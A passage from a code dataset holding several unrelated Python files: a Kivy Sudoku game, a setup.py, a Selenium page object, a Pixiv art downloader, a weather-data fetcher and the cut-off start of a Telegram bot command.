noinspection PyTypeChecker\n self.board[p // side][p % side] = 0\n\n def solve(self):\n def find_next_empty(i, j):\n for row in range(i, 9):\n for col in range(j, 9):\n if self.board[row][col] == 0:\n return row, col\n for row in range(0, 9):\n for col in range(0, 9):\n if self.board[row][col] == 0:\n return row, col\n return -1, -1\n\n def is_valid(i, j, e):\n row_ok = all([e != self.board[i][x] for x in range(9)])\n if row_ok:\n col_ok = all([e != self.board[x][j] for x in range(9)])\n if col_ok:\n # finding the top left x,y co-ordinates of the section containing the i,j cell\n sec_top_x, sec_top_y = 3 * (i // 3), 3 * (j // 3) # floored quotient should be used here.\n for x in range(sec_top_x, sec_top_x + 3):\n for y in range(sec_top_y, sec_top_y + 3):\n if self.board[x][y] == e:\n return False\n return True\n return False\n\n def solve_sudoku(i=0, j=0):\n i, j = find_next_empty(i, j)\n if i == -1:\n return True\n for e in range(1, 10):\n if is_valid(i, j, e):\n self.board[i][j] = e\n self.cells[i][j].text = str(e)\n if solve_sudoku(i, j):\n return True\n # Undo the current cell for backtracking\n self.board[i][j] = 0\n return False\n\n return solve_sudoku()\n\n def clear_board(self):\n for cell in self.grid.children:\n row = cell.row\n col = cell.col\n if not cell.generated:\n cell.text = ''\n self.board[row][col] = 0\n\n def reset(self):\n self.clear_board()\n self.seconds = 0\n self.timer.text = seconds2str(self.seconds)\n self.start_timer()\n\n def update_grid(self):\n for cell in self.grid.children:\n value = self.board[cell.row][cell.col]\n if value != 0:\n cell.text = str(value)\n else:\n cell.text = ''\n\n def cheat(self):\n if self.game_started:\n self.clear_board()\n self.clockEvent.cancel()\n success = self.solve()\n self.update_grid()\n if success:\n self.win()\n\n def check_board(self):\n for row in range(9):\n row_nums = set()\n for col in range(9):\n num = self.board[row][col]\n # van-e üres mező\n if num == 0:\n return False\n # van-e ismétlődés a sorban\n if num in row_nums:\n return False\n row_nums.add(num)\n\n for col in range(9):\n col_nums = set()\n for row in range(9):\n num = self.board[row][col]\n # van-e ismétlődés az oszlopban\n if num in col_nums:\n return False\n col_nums.add(num)\n\n for square in range(1, 4):\n square_nums = set()\n for row in range(1, 4):\n for col in range(1, 4):\n num = self.board[square * row][square * col]\n # van-e ismétlődés a 3x3-as négyzetben\n if num in square_nums:\n return False\n square_nums.add(num)\n return True\n\n def win(self):\n self.game_started = False\n scoreboard = False\n\n conn, cur = open_db()\n count = cur.execute('SELECT count(*) FROM scores').fetchone()[0]\n\n if count < 10:\n scoreboard = True\n else:\n for row in cur.execute('SELECT date, name, seconds FROM scores ORDER BY seconds LIMIT 10'):\n if self.seconds < row[2]:\n scoreboard = True\n break\n conn.close()\n\n if scoreboard:\n popup = EnterNamePopup(self.seconds)\n popup.open()\n\n def create_cells(self):\n self.grid.clear_widgets()\n self.cells.clear()\n for row in range(9):\n self.cells.append([])\n for col in range(9):\n cell = SudokuCell(row, col, self)\n if self.board[row][col] != 0:\n cell.text = str(self.board[row][col])\n cell.generated = True\n else:\n cell.generated = False\n\n cell.set_background()\n self.grid.add_widget(cell)\n self.cells[row].append(cell)\n for cell in self.grid.children:\n value = self.board[cell.row][cell.col]\n if value != 0:\n cell.text = str(value)\n cell.generated = True\n else:\n cell.text = ''\n cell.generated = False\n cell.set_background()\n\n def select(self, row, col):\n for cell in self.grid.children:\n if isinstance(cell, SudokuCell):\n cell.set_background()\n self.selection = (row, col)\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass SudokuCell(Button):\n def __init__(self, row, col, screen, generated=False, **kwargs):\n super(SudokuCell, self).__init__(**kwargs)\n self.row = row\n self.col = col\n self.screen = screen\n self.generated = generated\n self.background_normal = \"white.png\"\n self.background_down = \"white.png\"\n self.color = cell_color_default\n self.set_background()\n\n def set_background(self):\n if self.generated:\n self.background_color = cell_background_generated\n else:\n upper_left = (self.row < 3 and self.col < 3)\n upper_right = (self.row < 3 and self.col > 5)\n middle = (3 <= self.row <= 5 and 3 <= self.col <= 5)\n lower_left = (self.row > 5 and self.col < 3)\n lower_right = (self.row > 5 and self.col > 5)\n if upper_left or upper_right or middle or lower_left or lower_right:\n self.background_color = cell_background_accent\n else:\n self.background_color = cell_background_default\n\n def select(self):\n if self.generated:\n return False\n self.screen.select(self.row, self.col)\n self.background_color = cell_background_selected\n return True\n\n\nclass RulesScreen(Screen):\n def __init__(self, **kwargs):\n super(RulesScreen, self).__init__(**kwargs)\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass ScoreboardScreen(Screen):\n def __init__(self, **kwargs):\n super(ScoreboardScreen, self).__init__(**kwargs)\n\n def create_list(self):\n self.scoreList.clear_widgets()\n conn, cur = open_db()\n\n count = 0\n for row in cur.execute('SELECT date, name, seconds FROM scores ORDER BY seconds LIMIT 10'):\n count += 1\n row_layout = BoxLayout()\n\n label1 = Label(text=f'{count}.')\n label1.color = (0, 0, 0, 1)\n label1.font_size = 20\n row_layout.add_widget(label1)\n\n label2 = Label(text=str(row[1]))\n label2.color = (0, 0, 0, 1)\n label2.font_size = 20\n row_layout.add_widget(label2)\n\n label3 = Label(text=seconds2str(row[2]))\n label3.color = (0, 0, 0, 1)\n label3.font_size = 20\n row_layout.add_widget(label3)\n\n label4 = Label(text=str(row[0]).split('.')[0])\n label4.color = (0, 0, 0, 1)\n label4.font_size = 20\n row_layout.add_widget(label4)\n\n self.scoreList.add_widget(row_layout)\n\n conn.close()\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass EnterNamePopup(Popup):\n def __init__(self, seconds, **kwargs):\n super(EnterNamePopup, self).__init__(**kwargs)\n self.title = 'Felkerültél a pontlistára!'\n self.auto_dismiss = False\n self.seconds = seconds\n\n def save_score(self):\n conn, cur = open_db()\n\n if self.player_name.text:\n name = self.player_name.text\n else:\n name = '-'\n\n record = (datetime.now(), name, self.seconds)\n cur.execute('INSERT INTO scores VALUES (?, ?, ?)', record)\n conn.commit()\n conn.close()\n self.dismiss()\n\n\nclass SudokuApp(App):\n def __init__(self, **kwargs):\n super(SudokuApp, self).__init__(**kwargs)\n\n def build(self):\n sm.transition = WipeTransition()\n\n menu_screen = MenuScreen(name='Menu')\n sm.add_widget(menu_screen)\n\n game_screen = GameScreen(name='Game')\n sm.add_widget(game_screen)\n\n rules_screen = RulesScreen(name='Rules')\n sm.add_widget(rules_screen)\n\n scoreboard_screen = ScoreboardScreen(name='Scoreboard')\n sm.add_widget(scoreboard_screen)\n\n sm.current = 'Menu'\n return sm\n\n\nif __name__ == '__main__':\n SudokuApp().run()\n","repo_name":"arvaid/eke-progkorny-bead1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21727322231","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"demand-manager\", # Replace with your own username\n version=\"0.0.2\",\n author=\"Shan Dora He\",\n author_email=\"dora.shan.he@gmail.com\",\n description=\"Demand manager optimally schedules loads (e.g. appliances, batteries and EVs) \"\n \"of single or multiple households to minimise the peak demand, \"\n \"energy usage cost (and network charge if any) and discomfort \"\n \"using MiniZinc and solvers (e.g. COIN-BC, Gurobi and CPLEX). \",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dorahee/demand-manager.git\",\n packages=setuptools.find_packages(include=['demand-manager', 'demand-manager.*']),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"dorahee/demand-manager","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21450271066","text":"from selenium.webdriver.common.by import By\n\nfrom src.POM.Pages.basePage import BasePage\n\n\nclass DashboardPage(BasePage):\n\n def __init__(self, driver):\n self.driver = driver\n\n inventoryList = By.XPATH, \"//div[@class='inventory_item']\"\n inventoryPageSideMenu = By.XPATH, \"//div[@class='bm-burger-button']/button\"\n addToCartButton = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_description']/div/button\"\n removeFromCartButton = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_description']/div/button\"\n cartCount = By.XPATH, \"//div/a/span\"\n filterDropDown = By.XPATH, \"//span[@class='select_container']\"\n filterDropDownValue = \"//select/option[contains(text(),'{filName}')]\"\n selectedFilter = \"//span[contains(text(),'{selectedFilterName}')]\"\n elementsName = \"(//div/a/div)\"\n elementsPrize = \"(//div[@class='pricebar']/div)\"\n cartLink = By.XPATH, \"//a[@class='shopping_cart_link']\"\n productDescription = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_label']/div\"\n\n def countOfItems(self, eleCount):\n count = self.get_count(self.inventoryList)\n assert eleCount in str(count)\n\n def addProductToCart(self, product):\n productToAdd = By.XPATH, self.addToCartButton.format(productName=product)\n self.do_click(productToAdd)\n\n def verifyProductAddToCart(self, noOfProducts):\n cartCount = self.get_element_text(self.cartCount)\n assert cartCount in cartCount\n\n def selectFilterDropDownValue(self, filterName):\n filterToSelect = By.XPATH, self.filterDropDownValue.format(filName=filterName)\n self.do_click(self.filterDropDown)\n self.do_click(filterToSelect)\n selectedFilter = By.XPATH, self.selectedFilter.format(selectedFilterName=filterName)\n isFilterSelected = self.is_visible(selectedFilter)\n assert isFilterSelected\n\n def removeProductFromCart(self, product):\n productToRemove = By.XPATH, self.addToCartButton.format(productName=product)\n self.do_click(productToRemove)\n\n def verifySortedListAtoZ(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsName))\n sortedElementList = sorted(allElementsName)\n assert allElementsName == sortedElementList\n\n def verifySortedListZtoA(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsName))\n sortedElementList = sorted(allElementsName, reverse=True)\n assert allElementsName == sortedElementList\n\n def verifySortedListPrizeLowToHigh(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsPrize))\n elementListOriginal = []\n for item in allElementsName:\n elementListOriginal.append(item.replace(\"$\", ''))\n sortedElementList = sorted(elementListOriginal, key=lambda x: float(x))\n assert sortedElementList == elementListOriginal\n\n def verifySortedListPrizeHighToLow(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsPrize))\n elementListOriginal = []\n for item in allElementsName:\n elementListOriginal.append(item.replace(\"$\", ''))\n sortedElementList = sorted(elementListOriginal, key=lambda x: float(x), reverse=True)\n assert sortedElementList == elementListOriginal\n\n def navigateToCartPage(self):\n self.do_click(self.cartLink)\n\n def getProductDescription(self, product):\n productDescription = By.XPATH, self.productDescription.format(productName=product)\n productDescriptionText = self.get_element_text(productDescription)\n return productDescriptionText\n","repo_name":"SachinKumar1606/SeleniumPythonPOM","sub_path":"src/POM/Pages/dashboardPage.py","file_name":"dashboardPage.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37651950074","text":"import os\nimport aiohttp\nimport asyncio\nfrom sys import stderr\nfrom time import sleep\nfrom threading import Thread\nfrom loguru import logger\n\nimport requests\nfrom sqlalchemy import and_\nfrom pixivpy3 import AppPixivAPI as SyncApi\nfrom pixivpy3.utils import JsonDict\nfrom pixivpy_async import PixivClient, AppPixivAPI\nfrom aiohttp.client_exceptions import ServerDisconnectedError\n\nimport config\nfrom config import REFRESH_TOKEN\nfrom src.database import session_maker, Art\n\n\ndef download_disconnect_handle(function):\n async def inner(session, url, file_name):\n try:\n await function(session, url, file_name)\n except ServerDisconnectedError:\n logger.error(f'Server closed connection with {url}, download failed\\n')\n return inner\n\n\n@download_disconnect_handle\nasync def download_data(session, url, file_name):\n logger.info(f'Downloading file {url}')\n sleep(0.1)\n async with session.get(url, headers={'Referer': 'https://app-api.pixiv.net/'}) as response:\n data = await response.read()\n with session_maker() as session:\n art_id = url.split('/')[-1].split('.')[0]\n if 'ugoira' in art_id:\n logger.info(f'Download failed {url}')\n return\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n return\n if session.query(Art).filter(Art.url == url).first():\n logger.info(f'Art already exists {url}')\n return\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=url,\n posted=True\n )\n\n try:\n session.add(art)\n session.commit()\n except:\n return\n path = f'{config.appdata}\\\\{config.app_name}\\\\{file_name}'\n with open(path, 'wb') as image_file:\n image_file.write(data)\n image_file.close()\n logger.info(f'Success downloaded {url}')\n\n\n# modification for for search with bookmarks filter\nasync def search_illust_mod(\n app_api_,\n word: str,\n search_target: str = 'partial_match_for_tags',\n sort: str = 'date_desc',\n duration: str = None,\n filter: str = 'for_ios',\n offset: int = None,\n req_auth: bool = True,\n start_date=None,\n end_date=None,\n bookmark_num_min=None,\n bookmark_num_max=None\n):\n method, url = app_api_.api.search_illust\n if bookmark_num_min is not None:\n params = app_api_.set_params(\n word=word,\n search_target=search_target,\n sort=sort,\n filter=filter,\n duration=duration,\n offset=offset,\n start_date=start_date,\n end_date=end_date,\n bookmark_num_min=bookmark_num_min,\n bookmark_num_max=bookmark_num_max,\n )\n else:\n params = app_api_.set_params(\n word=word,\n search_target=search_target,\n sort=sort,\n filter=filter,\n duration=duration,\n offset=offset,\n start_date=start_date,\n end_date=end_date,\n )\n return await app_api_.requests_(method=method, url=url, params=params, auth=req_auth)\n\n\ndef make_dir(dir_name):\n path = f'images/{dir_name}/'\n if not os.path.exists(path):\n os.mkdir(path)\n\n return path\n\n\nasync def make_arts_pack(data):\n arts_pack = []\n if not data.get('illusts'):\n return arts_pack\n for illust_data in data['illusts']:\n if illust_data['meta_single_page']:\n arts_pack.append(illust_data['meta_single_page']['original_image_url'])\n elif illust_data['meta_pages']:\n for art_urls in illust_data['meta_pages']:\n arts_pack.append(art_urls['image_urls']['original'])\n return arts_pack\n\n\nasync def download_arts_by_tag(tag, pack_num, min_bookmark=0, max_bookmark=0):\n async with PixivClient() as client:\n api = AppPixivAPI(client=client)\n await api.login(refresh_token=REFRESH_TOKEN)\n next_pack = {\n \"word\": tag,\n \"search_target\": \"partial_match_for_tags\",\n \"sort\": \"date_desc\",\n \"filter\": \"for_ios\",\n \"bookmark_num_min\": min_bookmark,\n \"bookmark_num_max\": max_bookmark,\n \"offset\": 0\n }\n download_queue = []\n while int(pack_num) > len(download_queue):\n if next_pack == {}:\n break\n data = await search_illust_mod(api, **next_pack)\n arts_pack = await make_arts_pack(data)\n for art_url in arts_pack:\n if len(download_queue) >= int(pack_num):\n break\n with session_maker() as session:\n if not session.query(Art).filter(Art.url == art_url).first():\n download_queue.append(art_url)\n\n next_pack = api.parse_qs(data.next_url) if api.parse_qs(data.next_url) else {}\n\n async with aiohttp.ClientSession() as session:\n tasks = list()\n for art in download_queue:\n tasks.append(asyncio.create_task(download_data(session=session, url=art, file_name=art.split('/')[-1])))\n await asyncio.gather(*tasks)\n\n\n# --------------------------------------------\n\n\ndef following_demon() -> None:\n logger.info('following_demon started')\n api = SyncApi()\n api.auth(refresh_token=REFRESH_TOKEN)\n next_users_pack = {\n 'restrict': 'public',\n 'user_id': config.USER_ID,\n 'offset': 0\n }\n while next_users_pack:\n user_following_json = api.user_following(**next_users_pack)\n if not user_following_json.user_previews:\n next_users_pack = None\n break\n users_handler(api, user_following_json)\n next_users_pack = api.parse_qs(user_following_json.next_url)\n sleep(config.request_delay)\n print(next_users_pack['offset'])\n logger.info('following_demon end')\n\n\ndef users_handler(api: SyncApi, users: JsonDict) -> None:\n for user_data in users.user_previews:\n next_arts_pack = {\n 'user_id': user_data.user.id,\n 'filter': 'for_ios',\n 'type': 'illust',\n 'offset': 0\n }\n while next_arts_pack:\n response = api.user_illusts(**next_arts_pack)\n if not response.illusts:\n next_arts_pack = None\n break\n for art_data in response.illusts:\n save_art_url(art_data)\n next_arts_pack = api.parse_qs(response.next_url)\n sleep(config.request_delay)\n\n\ndef save_art_url(art_data: JsonDict) -> None:\n try:\n if art_data.meta_pages:\n if art_data.type != 'illust':\n return\n for meta_page in art_data.meta_pages:\n with session_maker() as session:\n art_id = meta_page.image_urls.original.split('/')[-1].split('.')[0]\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n continue\n if session.query(Art).filter(Art.url == meta_page.image_urls.original).first():\n continue\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=meta_page.image_urls.original,\n posted=False,\n author_id=art_data.user.id\n )\n session.add(art)\n session.commit()\n session.close()\n\n elif art_data.meta_single_page:\n with session_maker() as session:\n if not art_data.meta_single_page.original_image_url or art_data.type != 'illust':\n return\n art_id = art_data.meta_single_page.original_image_url.split('/')[-1].split('.')[0]\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n return\n if session.query(Art).filter(Art.url == art_data.meta_single_page.original_image_url).first():\n return\n\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=art_data.meta_single_page.original_image_url,\n posted=False,\n author_id=art_data.user.id\n )\n session.add(art)\n session.commit()\n del art\n session.close()\n except Exception:\n logger.info(art_data)\n raise\n\n\ndef download_following(pack_size: int) -> None:\n with session_maker() as session:\n arts = session.query(Art).filter(Art.posted!=True).order_by(Art.pixiv_id.desc()).limit(pack_size).all()\n queue = [Thread(target=download_file, args=(art.url, )) for art in arts]\n for thread in queue:\n sleep(2)\n thread.start()\n for thread in queue:\n thread.join()\n\n\ndef download_file(url: str) -> None:\n with session_maker() as session:\n logger.info(f'Downloading file {url}')\n response = requests.get(url, headers={'Referer': 'https://app-api.pixiv.net/'})\n session.query(Art).filter(Art.url == url).update({'posted': True})\n session.commit()\n path = f'{config.appdata}\\\\{config.app_name}\\\\{url.split(\"/\")[-1]}'\n with open(path, 'wb') as image_file:\n image_file.write(response.content)\n logger.info(f'Success downloaded {url}')\n","repo_name":"rokv1l/arts_poster","sub_path":"app/core/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36904425972","text":"#!/usr/bin/env python3\n# ~*~ encoding: utf-8 ~*~\n\n\n#========\n# name: ws.py\n# date: 2018NOV13\n# prog: pr\n# desc: grab your local BOM data & save to file, simplify data if needed\n# save as json to new (web) directory for use.\n# \n# WSD ☀️🌤️🌦️🌧️\n#\n# 2018NOV13\n# create option to reverse data order to compensate for data that \n# is ordered. this is important, especially if in the case of \n# weather data that is date ordered. Only available if you \n# extract and simplify. Usage below.\n#\n# ./ws.py -e -s -b\n# \n# the option is only available using -e and -s\n#\n#\n# 2018NOV06\n# add rain_trace to data processing. allows weather.js to rain\n# information \n# \n# 2018NOV02\n# fix this crap:\n#\n# TODO initialisation of these fields is dodgy, verify\n# add these fields to the header so we don't have problem of \n# undefined. But we have to work with this on d3js side\n#\n# reformat that local time to a ISO format so we can convert to Date in JS side \n# the objective here is to create a datetime ISO standard, then at JS\n# side you can create a date and manipulate it.\n#\n# local_date_time_full local_date_time_iso\n# ie: \"20181102083000\" ==> \"2018-11-02T08:30:00\"\n# \n# Note the key change: local_date_time_full to local_date_time_iso\n# this needs to be used JS side.\n#\n# doing this allows great flexability at the d3js side where you can \n# manipulate dates and times at high granular level for graphing.\n#\n#\n# 2018NOV01\n# Dates in JavaScript suck bad!\n# \n# So I'm left with pre-processing the dates and while I'm at it, \n# reduce the number of fields (supress) so the data is ONLY what\n# I need. At the moment this is:\n#\n# * date in local time\n# * temperature\n#\n# need to add a blank set of keys and blank values to avoid 'undefined'\n# when reading first record. is there a better way to do this? add a \n# header? that's what got me in the first place. \n# \n# 2018OCT31\n# for extracted weather data: minor update to make unique filename\n# with date optional & replace with default until directed. \n# Makes easier to have the same filename when calling from D3 code.\n#\n#\n# 2018OCT30: \n# A lost day. bugger: the file is so complex I'm having problems \n# parsing the data in d3. one solution is to extract what I need \n# from this file, write to another less complex file:\n#\n# filename: yyyymmmdd.json\n# \n# header.refresh_message as description\n# header.name as location\n# header.ID/header.mainID as id\n# header.main_ID as mid\n# \n# data.array: array of data files from existing file\n#\n# source file: \n# melbourne airport \n# \n#\n# data file: \n# melbourne airport \n# \n# \n# usge: \n# create JSON data file\n# ./ws.py -n -t 'melbourne airport' -f \"json\" -u http://www.bom.gov.au/fwo/IDV60801/IDV60801.94866.json\n# GET\n# ./ws.py -g\n#\n#\n# EXTRACT\n# ./ws.py -e \n# rename\n# ./ws.py -e -r\n# SIMPLIFY\n# ./ws.py -e -s \n# backwards\n# ./ws.py -e -s -b\n#\n# debug\n# ./ws.py -d\n# help\n# ./ws.py -h\n# uses:\n# python requests library\n#========\n\n\n__url__ = \"https://github.com/peterrenshaw/wsd\"\n__email__ = \"peterrenshaw@seldomlogical.com\"\n__author__=\"Peter RENSHAW\"\n__license__=\"GNU GPL 3.0\"\n__version__=\"0.2.5\"\n__description__=\"\"\"grab your local BOM data & save to file, simplify data if needed save as json to new (web) directory for use\"\"\"\n\n\nimport os\nimport sys\nimport json\nimport time\nimport datetime\nfrom optparse import OptionParser\n\n\nimport requests # pip3 import requests\nfrom requests import get\n\n\nfrom config import PROG_NAME\nfrom config import BASE_PATH\nfrom config import CONF_DATA_FILE\nfrom config import WEATHER_DATA_ALL_FN\nfrom config import WEATHER_DATA_SIMPLE_FN\nfrom config import WEATHER_DATA_SIMPLE_HEAD_FN\n\n\n#--------- keep here ---------\nVERSION = __version__\nCODE_PATH = os.path.join(BASE_PATH, \"py/wsd\")\nDEST_PATH = os.path.join(BASE_PATH, \"d3\") #TODO: optional save to argument directory\nCDFPN = os.path.join(CODE_PATH, CONF_DATA_FILE)\nWDFPN = os.path.join(DEST_PATH, WEATHER_DATA_ALL_FN)\n#--------- keep here ---------\n\n\n#--------\n# get_config: load config data given filepath, \n# return format, filename and url to extract\n# \n# WARNING: convenince methods call this\n# function. if you want more than\n# bit of config use this method.\n# \n# * want all the config info? use this method. \n# * want only URL? use get_config_url\n# \n#--------\ndef get_config(filepathname=CDFPN, debug=False):\n \"\"\"\n load configuration data given filepath\n then retrieve url.\n \"\"\"\n # convert from JSON\n with open(filepathname, 'r') as f:\n data = json.load(f)\n f.close()\n \n if debug:\n print(\"load data...\")\n print(\"key:\\tvalue\")\n print(\"--- \\t------------\")\n for key in data.keys():\n print(\"{}:\\t{}\".format(key, data[key]))\n\n # lets download resource file\n url = data['url']\n title = data['title']\n data_format = data['format']\n \n return {'url': url, 'title': title, 'format': data_format}\ndef get_config_url(fpn=CDFPN, debug=False):\n \"\"\"convenince method for get_config\"\"\"\n url = get_config(fpn, debug)['url']\n return url \n\n\n#======\n# main: cli entry point\n#======\ndef main():\n usage = \"usage %prog -u -t\"\n parser = OptionParser(usage)\n parser.add_option(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\", help=\"show debug messages\")\n parser.add_option(\"-n\", \"--new\", dest=\"new\", action='store_true', help=\"create new config file\", )\n parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"url of weather data\")\n parser.add_option(\"-f\", \"--format\", dest=\"format\", help=\"url data format\")\n parser.add_option(\"-t\", \"--title\", dest=\"title\", help=\"name of weather location\")\n parser.add_option(\"-g\", \"--get\", dest=\"get\", action=\"store_true\", help=\"get lastest data\")\n parser.add_option(\"-e\", \"--extract\", dest=\"extract\", action=\"store_true\", help=\"extract the good bits\")\n parser.add_option(\"-s\", \"--simplify\", dest=\"simplify\", action=\"store_true\", help=\"simplify extaction, remove unwanted data fields\")\n parser.add_option(\"-r\", \"--rename\", dest=\"rename\", action=\"store_true\", help=\"rename the extracted file to ^yyymmmddThh^ format\")\n parser.add_option(\"-b\", \"--backwards\", dest=\"backwards\", action=\"store_true\", help=\"reverse option for data collected, reverse the data order\")\n options, args = parser.parse_args()\n\n\n if options.debug:\n print(\"{} v{}.\".format(PROG_NAME, VERSION))\n print(\"debug on\")\n print(\"filepath config: <{}>\".format(CDFPN))\n print(\"filepath latest: <{}>\".format(WDFPN))\n\n # get the latest data\n if options.get:\n\n # read configuration\n if os.path.isfile(CDFPN):\n\n # get weather data url...\n url = get_config_url(debug=options.debug)\n\n # request a copy of the url file, \n # save to file so we can use it.\n with open(WDFPN, \"wb\") as f:\n response = get(url)\n f.write(response.content)\n f.close()\n\n if options.debug:\n print(\"saved:\\t<{}>\".format(wdfn))\n else:\n sys.stderr.write(\"Error: No configuration file, please create a new configuration data file.\")\n\n # build a new configuration file\n elif options.new:\n \n # given URL and TITLE\n if not options.url:\n sys.stderr.write(\"Error: Please a valid URL for weather location data.\")\n if not options.title:\n sys.stderr.write(\"Error: Please supply a name or descriptive title for weather location.\")\n if not options.format:\n sys.stderr.write(\"Error: Please supply a format for the weather location data.\")\n\n # build and save data to file as JSON\n data = {}\n data['title'] = options.title\n data['url'] = options.url\n data['format'] = options.format\n\n if options.debug:\n print(\"create configuration\")\n print(\"<{}>\".format(data))\n \n # convert to JSON, save config\n with open(CDFPN, 'w') as f:\n json.dump(data, f, \n ensure_ascii=False,\n indent=4,\n sort_keys=True)\n f.close()\n sys.exit(0)\n\n elif options.extract:\n if os.path.isfile(WDFPN):\n if options.debug:\n print(\"extract from <{}>\".format(WDFPN))\n\n # read, load as JSON\n data = None\n with open(WDFPN) as f:\n data = f.read()\n f.close()\n \n \n # convert data from json format \n # to PY data structures to allow \n # easy manipulation\n pyd = json.loads(data)\n\n\n #--------\n # extract good bits:\n # this is hard-coded for the BOM weather data\n # formats. \n # \n # WARNING: if things break, it will be here but will not be likely. \n # \n observations = pyd['observations']\n data = observations['data']\n header = observations['header']\n #--------\n\n\n #-------\n # data extraction:\n # placeholder for data extraction.\n # if options.simplify is chosen\n # look at keys in 'key_simple' and\n # extract and add to data list\n # else\n # extract all the data\n #-------\n kvd = []\n h = []\n if options.simplify:\n d = []\n ds = {}\n ds_line = {'apparent_t': 0,\n 'local_date_time_iso': '',\n 'gust_kmh': 0,\n 'rel_hum': 0,\n 'rain_trace': 0,\n 'sort_order': 0}\n\n # look thru data, extract keys using key_simple \n # process, local_date_time_full\n #\n # \"20181102083000\" ==> \"2018-11-02T08:30:00\"\n #\n # reformat that local time to a ISO format \n # so we can convert to Date in JS side \n title = \"latest\"\n name = header[0]['name']\n timezone = header[0]['state_time_zone']\n location = \"{} / {}\".format(name, timezone)\n\n message = header[0]['refresh_message']\n product = \"{}.{}\".format(header[0]['main_ID'], header[0]['ID'])\n\n #h.append(title.upper())\n h.append(location.upper())\n h.append(message.capitalize())\n #h.append(product.lower())\n\n # gather the data\n for item in data:\n for key in item.keys():\n \n if key in ds_line:\n ds[key] = item[key]\n if key == 'local_date_time_full':\n dt = datetime.datetime(*time.strptime(item['local_date_time_full'], \"%Y%m%d%H%M%S\")[0:5])\n ds['local_date_time_iso'] = dt.isoformat()\n \n d.append(ds)\n ds = {}\n kvd = d\n else:\n kvd = data \n\n\n #--------\n # organise data:\n # I want a simple list with a simple header and line items of\n # data. A simple array in JS, header info at first line, rest\n # of the data follows. Easy peasy. \n data = []\n for item in kvd: # if simple, reduced values otherwise alldata \n data.append(item) # lots of data items follow\n d = data\n #--------\n\n \n #--------\n # does the data need to be reversed?\n # this option grabs the list and \n # reverses the order so it is backwards.\n if options.backwards:\n d.reverse()\n if options.debug:\n print(\"{}\\n{}\\n{}\".format(len(d), d[0], d[len(d)-1]))\n\n\n #--------\n # build file name:\n # SPECIFIC (-r, rename option. takes no options formats as yyyymmmddThh\n # I want a filename that is unique to the hour. I don't care if\n # it's overwritten, however it may/maynot represent the ^latest^ so \n # remember the date as a string is in the output description.\n # GENERIC (default)\n # uses generic name as this is easy to call when updating\n # using remote code\n #\n if options.rename: \n # build unique filename: YYYY, MMM, DD, 'T' and 24HH\n fn = time.strftime(\"%Y%b%dT%H\")\n fn = \"{}.json\".format(fn.upper())\n fnh = \"{}-header.json\".format(fn.upper())\n else:\n # different fn, dont overwrite detailed fn. \n # use default fn for simplified, extracted data\n fn = WEATHER_DATA_SIMPLE_FN\n fnh = WEATHER_DATA_SIMPLE_HEAD_FN \n\n # filepath with destination path \n fpn = os.path.join(DEST_PATH, fn)\n fpnh = os.path.join(DEST_PATH, fnh) \n #--------\n\n\n #---------\n # data format:\n # convert data to json, making sure it's easy to read\n jd = json.dumps(d, ensure_ascii=False,\n indent=4,\n sort_keys=True)\n jdh = json.dumps(h, ensure_ascii=False,\n indent=4,\n sort_keys=True)\n #---------\n\n\n #--------\n # save simple weather DATA file\n with open(fpn, 'w') as f:\n f.write(jd)\n f.close()\n # save simple weather HEADER file\n with open(fpnh, 'w') as f:\n f.write(jdh)\n f.close()\n #--------\n\n sys.exit(0)\n else:\n sys.stderr.write(\"Error: cannot locate file to extract\")\n \n # what? display help\n else:\n parser.print_help() \n \n\n\nif __name__ == \"__main__\":\n main()\n\n\n# vim: ff=unix:ts=4:sw=4:tw=78:noai:expandtab\n\n\n","repo_name":"peterrenshaw/wsd","sub_path":"wsd.py","file_name":"wsd.py","file_ext":"py","file_size_in_byte":15120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1636360376","text":"from tg_bot import dispatcher\r\nfrom tg_bot.modules.disable import DisableAbleCommandHandler\r\nfrom telegram import Update\r\nfrom telegram.ext import CallbackContext\r\n\r\n\r\ndef shout(update: Update, context: CallbackContext):\r\n args = context.args\r\n text = \" \".join(args)\r\n result = 